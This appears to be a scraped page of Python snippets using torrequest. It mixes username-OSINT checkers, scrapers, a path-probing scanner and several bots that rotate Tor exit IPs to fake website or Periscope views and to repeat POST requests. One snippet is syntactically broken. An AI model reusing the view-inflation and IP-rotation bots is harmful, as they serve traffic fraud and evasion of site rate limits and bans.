        for hani in passe:
            curl = url + hani
            web = requests.get(curl)
            if web.status_code == 404:
                print curl + y + '  [' + r + 'X' + y + ']' + r + 'Gak Di Temukan /Not Found' + w
            elif web.status_code == 200:
                print curl + y + '  [' + g + '√' + y + ']' + g + 'Ditemukan / 200ok' + w
                os.system('sleep 3.6')

    if men_in == "12":
        about = r + """
</""" + g + """-----------------ABOUT-----------------""" + r + """/>""" + w + """
    Created by     : CapthaCode404_
    Tools          : Blog Tools Pack
    Version        : 1.1
    Premium        : Hub +6283870386264
    Thanks To      : Developer Security45 - BlackCoderCrush""" + r + """
</""" + g + """-----------------ABOUT-----------------""" + r + """/>"""

        print about
    if men_in == "13":
        os.system('xdg-open https://wa.me/6283870386264')
Exemple #2
0
def sherlock(username, verbose=False, tor=False, unique_tor=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.

    Return Value:
    Dictionary containing results from report.  Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    global amount
    fname = username + ".txt"

    if os.path.isfile(fname):
        os.remove(fname)
        print(
            "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Removing previous file:\033[1;37m {}\033[0m"
            .format(fname))

    print(
        "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Checking username\033[0m\033[1;37m {}\033[0m\033[1;92m on: \033[0m"
        .format(username))

    # A user agent is needed because some sites don't
    # return the correct information since they think that
    # we are bots
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'
    }

    # Load the data
    data_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
                                  "data.json")
    with open(data_file_path, "r", encoding="utf-8") as raw:
        data = json.load(raw)

    # Allow 1 thread for each external service, so `len(data)` threads total
    executor = ThreadPoolExecutor(max_workers=len(data))

    # Create session based on request methodology
    underlying_session = requests.session()
    underlying_request = requests.Request()
    if tor or unique_tor:
        underlying_request = TorRequest()
        underlying_session = underlying_request.session()

    # Create multi-threaded session for all requests
    session = FuturesSession(executor=executor, session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            print(
                "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Illegal Username Format For This Site!"
                .format(social_network))
            results_site["exists"] = "illegal"
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url

            # This future starts running the request in a new thread, doesn't block the main thread
            future = session.get(url=url, headers=headers)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type = get_response(request_future=future,
                                     error_type=error_type,
                                     social_network=social_network,
                                     verbose=verbose)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if not error in r.text:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 404
            if not r.status_code == 404:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "response_url":
            error = net_info.get("errorUrl")
            # Checks if the redirect url is the same as the one defined in data.json
            if not error in r.url:

                print(
                    "\033[37;1m[\033[92;1m+\033[37;1m]\033[92;1m {}:\033[0m".
                    format(social_network), url)
                write_to_file(url, fname)
                exists = "yes"
                amount = amount + 1
            else:
                print(
                    "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Not Found!"
                    .format(social_network))
                exists = "no"

        elif error_type == "":
            print(
                "\033[37;1m[\033[91;1m-\033[37;1m]\033[92;1m {}:\033[93;1m Error!"
                .format(social_network))
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    print(
        "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Saved: \033[37;1m{}\033[0m"
        .format(username + ".txt"))

    final_score(amount, fname)
    return results_total
Exemple #3
0
import csv
from bs4 import BeautifulSoup
import time
from torrequest import TorRequest
import random
from constants import BLANK, browsers

tr = TorRequest(proxy_port=9050, ctrl_port=9051, password=None)

headers = {'User-Agent': random.choice(browsers)}

words = list()

with open('gre2020-thesaurus-syn.csv') as f:
    reader = csv.DictReader(f)
    for row in reader:
        words.append(row)


def save_words(words):
    fieldnames = [
        'word', 'ko', 'zh_Hans', 'etym_zh_Hans', 'pron', 'ant', 'syn', 'etym'
    ]
    with open('gre2020-thesaurus-syn.csv', 'w') as f:
        writer = csv.DictWriter(f, fieldnames)
        writer.writeheader()
        for data in words:
            writer.writerow(data)


failed = list()
Exemple #4
0
import requests
import time
import sys
from torrequest import TorRequest

headers = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
}

print "Website Viewer"
#Default Tor port configuration
proxyPort = 9050
ctrlPort = 9051
site = raw_input("Enter your Site Address : ")
hits = input("Enter The number of Viewers : ")


def run():
    response = tr.get(site, headers=headers, verify=False)
    print "[" + str(i) + "]" + " Site View Added With IP:" + tr.get(
        'http://ipecho.net/plain').content
    tr.reset_identity()


if __name__ == '__main__':
    with TorRequest(proxy_port=proxyPort, ctrl_port=ctrlPort,
                    password=None) as tr:
        for i in range(hits):
            run()
Exemple #5
0
import time
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

## BEGINNING OF CONFIGURATION

url = 'URL'

cookies = {}

headers = {}

data = ''

## END OF CONFIGURATION

no_of_requests = 50

for x in range(no_of_requests):
    with TorRequest() as tr:
        response1 = tr.get('http://ipecho.net/plain')
        response2 = tr.post(url,
                            headers=headers,
                            cookies=cookies,
                            data=data,
                            verify=False)
        print(str(x) + " " + response1.text + " " + response2.text)
        tr.close()
    time.sleep(3)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 15 16:04:31 2019

@author: chevik
"""
from stem import Signal
from stem.control import Controller
import requests
import re
import json
from requests import Request, Session
from torrequest import TorRequest
tr=TorRequest(password='******')
tr.reset_identity() #Reset Tor

_cookiles_list=[]
class PeriscopeBot:
    _apiUrl = 'https://api.periscope.tv/api/v2'
    _session = ''
    _token = ''
    _broadcast_id = 0

    def __init__(self, broadcast_id):
        self._session = tr.session
        self._session.headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
        self._session.headers['Accept-Encoding'] ='gzip, deflate, br'
        self._session.headers['Cache-Control'] ='max-age=0'
        self._session.headers['Host'] ='api.periscope.tv'
        self._session.headers['Upgrade-Insecure-Requests'] ='1'
Exemple #7
0
from torrequest import TorRequest
from news_1 import ListOfData
from random import random
from bs4 import BeautifulSoup as bs
import numpy as np
import time
# print(ListOfData)

ANOTHER_URL = "https://www.google.com/search?q="
tr = TorRequest(password='******')
tr.reset_identity()
lnght = len(ListOfData)
x = 0
delays = [random() for _ in range(10)] * 5

with open("news_2.py", "w") as fo:
    fo.writelines("BetterData = [\n")
    while True:
        if x >= lnght:
            break
        if x % 8 == 0:
            tr = TorRequest(password='******')
            tr.reset_identity()

        link = ListOfData[x][0]

        response = tr.get(ANOTHER_URL + link)
        soup = bs(response.content, "lxml")
        body = soup.body
        error_count = 0
Exemple #8
0
# Source: https://github.com/Rage997/Cheap-Flight-Finder/blob/master/main.py

from torrequest import TorRequest
import smtplib



tr=TorRequest(password='******')
#
# import requests
# response= requests.get('http://ipecho.net/plain')
# print ("My Original IP Address:",response.text)

tr.reset_identity() #Reset Tor
response= tr.get('http://ipecho.net/plain')
print ("New Ip Address",response.text)


# Email settings
gmailUsername = "******"
gmailPassword = "******"

def sendmail(username,password,msg):
    server = smtplib.SMTP('smtp.gmail.com:587')
    server.starttls()
    server.login(username,password)
    server.sendmail(username, username, msg)
    server.quit()

def searchOpodo(searchURL,maxPrice):
    # GET from server
Exemple #9
0
    print(datetime.now().strftime("%H:%M:%S"),
          "### SELECT COMPANIES FROM XLSX ###")
    main_company = pd.read_excel('XLS/yahoo_tickers.xlsx',
                                 sheet_name='Stock',
                                 skiprows=3)
    df_companies = main_company[main_company['Exchange'] == marketplace]
    print("Start the scrapping for ", len(df_companies))
    list_tickers = df_companies['Ticker'].tolist()
    return list_tickers


if __name__ == '__main__':
    nb_requests, analyzed, error = 0, 0, 0
    keyerror_list, valuerror_list, indexerror_list, zerodivision_list = [], [], [], []
    list_companies = select_company()
    with TorRequest(proxy_port=9150, ctrl_port=9051,
                    password='******') as tr:
        # Making 4 requests by company
        for ticker in list_companies:
            try:
                print(ticker)
                nb_requests += 4
                analyzed += 1
                financial = get_financial(tr, ticker)
                summary = get_summary(tr, ticker)
                compute_financial(financial, summary, ticker)
                if nb_requests >= 75:
                    nb_requests = 0

                    r1 = tr.get('http://ipecho.net/plain')
                    tr.reset_identity()
                    r2 = tr.get('http://ipecho.net/plain')
Exemple #10
0
 \__|_|  \__,_|_| |_| |_|\___|___|____/ \___/ \__|
                            |_____|
====================================================  
[+] Tool By ERROR_KI11ER
____________________________________________________________
"""
import urllib
os.system('clear')
print(name)

try:
    from torrequest import TorRequest
except:
    os.system('pip install torrequest')

tr = TorRequest(password=None)

h = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
}
a = input("URL    - ")
x = int(input("Amount - "))


def run():
    for i in range(x):
        tr.reset_identity()
        response = tr.get(a, headers=h)
        print("Added", i + 1, "Views")
Exemple #11
0
\033[1;32;40m   ____________________________________________________________
 _              __  __ _          ____        _
| |_ _ __ __ _ / _|/ _(_) ___    | __ )  ___ | |_
| __| '__/ _` | |_| |_| |/ __|   |  _ \ / _ \| __|
| |_| | | (_| |  _|  _| | (__    | |_) | (_) | |_
 \__|_|  \__,_|_| |_| |_|\___|___|____/ \___/ \__|
                            |_____|
\033[1;32;40m       ====================================================  
033[1;35;40m        [+] \033[1;37mTool By \033[1;31mERROR \033[1;37mKI11ER
033[1;32;40m____________________________________________________________
"""
try:
	from torrequest import TorRequest
except:
	os.system("pip install torrequest && clear")
	from torrequest import TorRequest

with TorRequest(password='******') as tr:

headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"}
a = str(input("URL    - "))
x = int(input("Amount - "))

def run():
	for i in range(x):
		tr.reset_identity()
		response= tr.get(a)
		print(i+1)

run()
import csv
from collections import defaultdict
from torrequest import TorRequest
import requests
from bs4 import BeautifulSoup

tr = TorRequest(password="******")
tr.reset_identity()
response= tr.get('http://ipecho.net/plain')
print ("New Ip Address",response.text)
def get_last_number(files):
    values = []
    for file in files:
        with open(f'{file}.csv', 'r') as f:
            opened_file = f.readlines()
            if opened_file:
                var = opened_file[-1].split('|')[0]
                values.append(int(var))

    if values:
        init = max(values)
    else:
        init = 0
    return init


def get_row(id):
    values = ["b", "d", "m"]
    orrialdea = f"https://artxiboa.mendezmende.org/es/busque-partidas-sacramentales/ver.html?id={id}&sacramento="
    fitxategia = None
    for v in values:
Exemple #13
0
def get_new_tr_obj():
    tr = TorRequest(proxy_port=9050, ctrl_port=9051, password='******')
    return tr
Exemple #14
0
def torIP():
    with TorRequest(proxy_port=9050,
                    ctrl_port=9051,
                    password='******') as tr:
        response = tr.get('http://ipecho.net/plain')
        print(response.text)  # not your IP address
def tor_connect():
    # makes initial tor connection
    tr = TorRequest(password='******')
    return tr
Exemple #16
0
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import re
from datetime import timedelta
from unidecode import unidecode
from datetime import datetime as dt
import schedule
import time
from textblob import TextBlob
import csv

with Controller.from_port(port = 9051) as controller:
    controller.authenticate(password='******')
    print("Success!")
    controller.signal(Signal.NEWNYM)
    print("New Tor connection processed")
    torR=TorRequest(password='')
    torR.reset_identity() #Reset Tor
    response= torR.get('http://ipecho.net/plain')
    print("New Ip Address",response.text)


# Vader Sentiment Analyzer
analyzer = SentimentIntensityAnalyzer()
print('sentiment analyzer is ready!')

# scrape sentiment data
def scrape_nasdaq(stockcode, last_page_num=10):
    """
    Stockcode: FB/NFLX/AMZN/GOOGL
    """
    page_num = 0
Exemple #17
0
def snoop(username,
          site_data,
          verbose=False,
          tor=False,
          unique_tor=False,
          proxy=None,
          print_found_only=False,
          timeout=None,
          color=True):
    """Snoop Аналитика.

    Snoop ищет никнеймы на различных интернет-ресурсах.

    Аргументы:
    username               -- Разыскиваемый никнейм.
    site_data              -- Snoop БД поддерживваемых сайтов 
    verbose                -- Подробная вербализация
    tor                    -- Служба Tor
    unique_tor             -- Опция Tor: новая цепочка при поиске для каждого сайта
    proxy                  -- Указание своего proxy
    timeoutout                -- Ограничение времени на ожидание ответа сайта
    color                  -- Монохромный/раскрашиваемый терминал

    Возвращаемые значения:
    Словарь, содержащий результаты из отчета. Ключом словаря является название
    сайта из БД, и значение другого словаря со следующими ключами::
        url_main:      URL основного сайта.
        url_user:      URL ведущий на пользователя (если такой аккаунт найден).
        exists:        Указание результатов теста на наличие аккаунта.
        http_status:   HTTP status code ответа сайта.
        response_text: Текст, который вернулся запрос-ответ от сайта (при ошибке соединения может отсутствовать)
    """

    print_info("разыскиваем:", username, color)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = ElapsedFuturesSession(max_workers=max_workers,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            if not print_found_only:
                print_invalid(social_network,
                              "Недопустимый формат имени для данного сайта",
                              color)

            results_site["exists"] = "illegal"
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            results_site['response_time_ms'] = ""
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            #If only the status_code is needed don't download the body
            if net_info["errorType"] == 'status_code':
                request_method = session.head
            else:
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy != None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3,
            color=color)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if not error in r.text:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                #
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "":
            if not print_found_only:
                print_invalid(social_network, "*Пропуск", color)
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
            logging.debug(
                'Could not update title with Google truncated title trick.')
            full_title = get_title(soup)
            logging.debug('Found it anyway here [{}]'.format(full_title))
        else:
            logging.debug('Nothing to do for title [{}]'.format(full_title))
    return full_title.strip()


if __name__ == '__main__':
    print "Enter \n=====\n\n1. for keyword google news dump\n2. for collecting news links meta data"
    user_selection = raw_input('user_selection keyword : ')
    if user_selection == str(1):
        while True:
            with TorRequest(proxy_port=9050,
                            ctrl_port=9051,
                            password=torpassword) as requests:
                requests.reset_identity()

                keyword = raw_input('keyword : ')
                try:
                    run(keyword)
                except:
                    print sys.exc_info()
                    print('EXCEPTION CAUGHT in __MAIN__')
                    print('Lets change our PUBLIC IP GUYS!')
                    requests.reset_identity()
    else:
        print "Enter File Name (relative path to current directory) [ structure - url1,url2 ] : "
        file_name = raw_input('file_name_keyword : ')
        file_links = open(file_name, "r").read()
Exemple #19
0
from stem import Signal
from stem.control import Controller
import requests
from torrequest import TorRequest

tr = TorRequest(password='******')
tr.reset_identity()  #Reset Tor
response = tr.get('http://ipecho.net/plain')
print("New Ip Address", response.text)
#------------------------------------------------------------
response = requests.get('http://ipecho.net/plain')
print("My Original IP Address:", response.text)
#------------------------------------------------------------

with Controller.from_port(port=9051) as controller:
    controller.authenticate(password='******')
    print("Success!")
    controller.signal(Signal.NEWNYM)
    print("New Tor connection processed")
response = requests.get('http://ipecho.net/plain')
print("IP Address after success s:", response.text)
Exemple #20
0
async def sherlock(username,
                   site_data,
                   query_notify,
                   logger,
                   tor=False,
                   unique_tor=False,
                   proxy=None,
                   timeout=None,
                   ids_search=False,
                   id_type='username',
                   tags=[],
                   debug=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    ids_search             -- Search for other usernames in website pages & recursive search by them.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username, id_type)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    # TODO: connector
    connector = aiohttp.TCPConnector(ssl=False)
    session = aiohttp.ClientSession(connector=connector)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # print(id_type) # print(social_network)
        if net_info.get('type', 'username') != id_type:
            continue

        site_tags = set(net_info.get('tags', []))
        if tags:
            if not tags.intersection(site_tags):
                continue

        if 'disabled' in net_info and net_info['disabled']:
            continue

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info.get('url').format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True) == True):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            def parse_cookies(cookies_str):
                cookies = SimpleCookie()
                cookies.load(cookies_str)
                return {key: morsel.value for key, morsel in cookies.items()}

            if os.path.exists(cookies_file):
                cookies_obj = cookielib.MozillaCookieJar(cookies_file)
                cookies_obj.load(ignore_discard=True, ignore_expires=True)
            else:
                cookies_obj = []

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    proxies=proxies,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                )
            else:
                future = request_method(
                    url=url_probe,
                    headers=headers,
                    allow_redirects=allow_redirects,
                    timeout=timeout,
                )

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # TODO: move into top-level function
    async def update_site_data_from_response(site, site_info):
        future = site_info.get('request_future')
        if not future:
            # ignore: search by incompatible id type
            return

        error_type = site_info['errorType']
        site_data[site]['resp'] = await get_response(request_future=future,
                                                     error_type=error_type,
                                                     social_network=site,
                                                     logger=logger)

    tasks = []
    for social_network, net_info in site_data.items():
        future = asyncio.ensure_future(
            update_site_data_from_response(social_network, net_info))
        tasks.append(future)

    await asyncio.gather(*tasks)
    await session.close()

    # TODO: split to separate functions
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)
        if not results_site:
            continue

        # Retrieve other site information again
        url = results_site.get("url_user")
        logger.debug(url)

        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Get the failure messages and comments
        failure_errors = net_info.get("errors", {})

        # TODO: refactor
        resp = net_info.get('resp')
        if not resp:
            logger.error(f'No response for {social_network}')
            continue

        html_text, status_code, error_text, expection_text = resp

        # TODO: add elapsed request time counting
        response_time = None

        if debug:
            with open('debug.txt', 'a') as f:
                status = status_code or 'No response'
                f.write(f'url: {url}\nerror: {str(error_text)}\nr: {status}\n')
                if html_text:
                    f.write(f'code: {status}\nresponse: {str(html_text)}\n')

        # TODO: move info separate module
        def detect_error_page(html_text, status_code, fail_flags, ignore_403):
            # Detect service restrictions such as a country restriction
            for flag, msg in fail_flags.items():
                if flag in html_text:
                    return 'Some site error', msg

            # Detect common restrictions such as provider censorship and bot protection
            for flag, msg in common_errors.items():
                if flag in html_text:
                    return 'Error', msg

            # Detect common site errors
            if status_code == 403 and not ignore_403:
                return 'Access denied', 'Access denied, use proxy/vpn'
            elif status_code >= 500:
                return f'Error {status_code}', f'Site error {status_code}'

            return None, None

        if status_code and not error_text:
            error_text, site_error_text = detect_error_page(
                html_text, status_code, failure_errors, 'ignore_403'
                in net_info)

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            absence_flags = net_info.get("errorMsg")
            is_absence_flags_list = isinstance(absence_flags, list)
            absence_flags_set = set(
                absence_flags) if is_absence_flags_list else set(
                    {absence_flags})
            # Checks if the error message is in the HTML
            is_absence_detected = any([(absence_flag in html_text)
                                       for absence_flag in absence_flags_set])
            if not is_absence_detected:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not status_code >= 300 or status_code < 200:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        extracted_ids_data = ''

        if ids_search and result.status == QueryStatus.CLAIMED:
            try:
                extracted_ids_data = extract(html_text)
